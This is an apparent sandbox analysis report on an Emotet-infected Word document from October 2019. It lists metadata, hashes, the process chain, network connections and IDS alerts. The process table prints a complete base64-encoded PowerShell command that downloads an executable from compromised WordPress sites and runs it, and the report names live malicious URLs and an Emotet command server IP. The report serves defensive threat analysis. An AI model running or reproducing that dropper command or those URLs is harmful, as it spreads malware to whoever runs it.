File name: | Alb. 3-9-8705617.doc |
Full analysis: | https://app.any.run/tasks/75bd3ffa-a453-44e3-9e48-07dc960a2b29 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 14, 2019, 15:43:36 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Danish Krone, Subject: synthesize, Author: Caterina Macejkovic, Keywords: deposit, Comments: maximize, Template: Normal.dotm, Last Saved By: Odessa Fay, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 14 06:52:00 2019, Last Saved Time/Date: Mon Oct 14 06:52:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 172, Security: 0 |
MD5: | 52EA8125E3C2E344612C15FE4AF50F0F |
SHA1: | 366570AD5E688BC8F2CFE7294EC8F6FA1FD4A48A |
SHA256: | C73A32D51B8FF9BEF3B5EFBCCEF5C3299EF574C2792788579E3F6F489D197C85 |
SSDEEP: | 6144:Og39prKKUzSFnLx3FhvbrptZI141ekKGQ2:Og39prHUGFt333TZ5ej |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | Danish Krone |
---|---|
Subject: | synthesize |
Author: | Caterina Macejkovic |
Keywords: | deposit |
Comments: | maximize |
Template: | Normal.dotm |
LastModifiedBy: | Odessa Fay |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:10:14 05:52:00 |
ModifyDate: | 2019:10:14 05:52:00 |
Pages: | 1 |
Words: | 30 |
Characters: | 172 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Nicolas Inc |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 201 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
Manager: | Sporer |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2108 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Alb. 3-9-8705617.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3352 | powershell -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeABkAGUAMwA3ADkAOQA3AGUAMwBjADEAMAA1ADcAMQA9ACcAYQAwAHgAMwBmADgAYgBjADcAMAA3ADEAZAAwAGQAJwA7ACQAYQAwAHgAYgA3ADUANABhADQAMAAxAGUANwBmADkAYgA0ACAAPQAgACcAOQA0ADkAJwA7ACQAYQAwAHgANgBmADYAMwBlADAAZAA4ADIAMAA3ADAAZAAyAD0AJwBhADAAeAA3ADYAZgBkADgANQA4ADYAMQA2ADIAZgA4AGIAJwA7ACQAYQAwAHgAOAAyAGIAOABkAGMANABiADEANwAxAGMAMwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYQAwAHgAYgA3ADUANABhADQAMAAxAGUANwBmADkAYgA0ACsAJwAuAGUAeABlACcAOwAkAGEAMAB4ADAANABiADAAZgAzADMAZgBlAGEAZAA9ACcAYQAwAHgAYgA5AGUANwA1ADYAYQBlADYAZgAnADsAJABhADAAeABjAGMANQBkADAANwAxADUAYQAxADIAZQA3AD0AJgAoACcAbgAnACsAJwBlAHcALQBvAGIAagBlACcAKwAnAGMAdAAnACkAIABOAEUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABhADAAeABiADAAZgAxADIAZQBmADgAZgBiADUAZgA9ACcAaAB0AHQAcAA6AC8ALwB0AGUAbgBkAGUAbgBjAGkAYQBzAHYALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADEAZAA5ADcAMgBhAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AYwBvAHIAcgBlAGwAYQB0AGkAbwBuAC4AYwBhAC8AZgBvAG4AdABzAC8ARgBTAEsAcgBZAE8AYwAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AbwBuAGUAeQBoAGEAaQByAHAAYQByAHQAeQAuAGMAbwBtAC8AYwBsAGEAcwBzAC4AbABvAGMAYQBsAC8AcABhAHIAdABzAF8AcwBlAHIAdgBpAGMAZQAvAHMANAB5ADAALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBkAGkAdgBpAG4AZQBkAG8AbABsAHoAYwBvAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBwAGcAcgBhAGQAZQAvAGsAYwBiAGcALwAqAGgAdAB0AHAAOgAvAC8AZABuAGMAdgBpAGUAdABuAGEAbQAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANABiAHYANAB6ADcAdQAvACcALgAiAFMAYABwAEwAaQBUACIAKAAnACoAJwApADsAJABhADAAeAA3AGUAZABmADYAOQA3ADAAOQA3AGYAYwAzADIAMAA9ACcAYQAwAHgAOAAwADIANgBkADMAOAAzADUAYwAxAGEANABhADkAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGEAMAB4ADAAZAAyAGMAOABlADMAMQA0AGEAMAAgAGkAbgAgACQAYQAwAHgAYgAwAGYAMQAyAGUAZgA4AGYAYgA1AGYAKQB7AHQAcgB5AHsAJABhADAAeABjAGMANQBkADAANwAxADUAYQAxADIAZQA3AC4AIgBkAG8AYAB3AGAATgBgAGwATwBBAGQARgBpAEwARQAiACgAJABhADAAeAAwAGQAMgBjADgAZQAzADEANABhADAALAAgACQAYQAwAHgAOAAyAGIAOABkAGMANABiADEANwAxAGMAMwApADsAJABhADAAeABiADAAMABhADcAZQBjAGIAZgA3ADgAOAAzAD0AJwBhADAAeAA3ADEAOAA3AGQAYgBhAGEANQBjACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAYQAwAHgAOAAyAGIAOABkAGMANABiADEANwAxAGMAMwApAC4AIgBsAEUAYABOAGcAdABoACIAIAAtAGcAZQAgADMANgA1ADkAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAFIAdAAiACgAJABhADAAeAA4ADIAYgA4AGQAYwA0AGIAMQA3ADEAYwAzACkAOwAkAGEAMAB4ADUAYwA1AGUAMQA3AGYAZAAzADEAPQAnAGEAMAB4AGEAZABjAGYAYgAyADUAMwAyADMAMgAxADEANgAxACcAOwBiAHIAZQBhAGsAOwAkAGEAMAB4AGUANgAxADcANQBhAGEAMgBhADEAZgBmAGEAZQA9ACcAYQAwAHgANwAwAGMAZAA1ADEAZQA3ADEAMwAyADkAMwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABhADAAeAA1ADgAMgA0AGEAZgBlADUAMwAxAGQAMQAwADYANAA9ACcAYQAwAHgAYQBiADkANQA0ADkANgBkADcAYQA1ADEAOAAxACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1788 | "C:\Users\admin\949.exe" | C:\Users\admin\949.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Description: DirectoryBrowse MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
1152 | --eced2e3c | C:\Users\admin\949.exe | 949.exe | |
User: admin Integrity Level: MEDIUM Description: DirectoryBrowse MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
3764 | "C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe" | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | — | 949.exe |
User: admin Integrity Level: MEDIUM Description: DirectoryBrowse MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
2440 | --f91b2738 | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | msptermsizes.exe | |
User: admin Integrity Level: MEDIUM Description: DirectoryBrowse MFC Application Version: 1, 0, 0, 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2108 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRAA15.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3352 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QINBT0W09LQDXC4QJV0U.temp | — | |
MD5:— | SHA256:— | |||
2108 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E56DDBC6.wmf | wmf | |
MD5:861B53BA12E6A45E1E42CEE3F1A99901 | SHA256:D5EC566A4CD111066F0D9331A5B7FE5A4C0FB6B586158562FE924FCBAA3034D9 | |||
2108 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6DEB6B50.wmf | wmf | |
MD5:903AAEF9AFB1605B0A179C8079060FE8 | SHA256:FD835CA6D7E2B7608A9597ADC0DDD2D8367F76D8300942256DDB27AB6A01C23C | |||
2108 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CDEAA3C4.wmf | wmf | |
MD5:3638BA3C5E313C1A051A3A1315DC20C8 | SHA256:E98A31F7217687A547DBC2867CF07DD53C32F1F54F485F9CD3E74EC01035D685 | |||
2108 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D493FDDE.wmf | wmf | |
MD5:81615599B69C2A43DC04752865F3C7AD | SHA256:DAE706845A3A147299BE27D1642167338FB2278A22C2C66583CE3A39F7522516 | |||
2108 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:394CD1743936AC750328446DF90979C6 | SHA256:7657D31718AC2E450E45DAC9ED56A29269785A682692DBA9DEC1C9B9F728B628 | |||
2108 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\107262F8.wmf | wmf | |
MD5:A2D9ECAC983E2AF442EF145899C04BD7 | SHA256:8A35F3637A1CC11C2E48322008FAA0DEFBAB39E505664F71E5A049805EF7C4C9 | |||
2108 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CA2CBBCB.wmf | wmf | |
MD5:BE82C0B2E9DDC13A99722399EDECAB9F | SHA256:BD90E2D1EA95895271107D24D64A0BA308E08BEE4B30BD05F686302E6571C804 | |||
2108 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A42B1013.wmf | wmf | |
MD5:AC07EEC2DBF71D4064CA3F9F20D0A086 | SHA256:D0EE5067835E5A1292E2805A6FDE4F8652D5287890B2651D366DCCA67247C965 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2440 | msptermsizes.exe | POST | 200 | 200.51.94.251:80 | http://200.51.94.251/nsip/enabled/add/merge/ | AR | binary | 132 b | malicious |
3352 | powershell.exe | GET | 200 | 149.56.222.236:80 | http://tendenciasv.com/wp-admin/1d972a/ | CA | executable | 536 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2440 | msptermsizes.exe | 200.51.94.251:80 | — | Telefonica de Argentina | AR | malicious |
3352 | powershell.exe | 149.56.222.236:80 | tendenciasv.com | OVH SAS | CA | suspicious |
Domain | IP | Reputation |
---|---|---|
tendenciasv.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
3352 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3352 | powershell.exe | A Network Trojan was detected | AV INFO Suspicious EXE download from WordPress folder |
3352 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3352 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2440 | msptermsizes.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 15 |
2440 | msptermsizes.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
2440 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |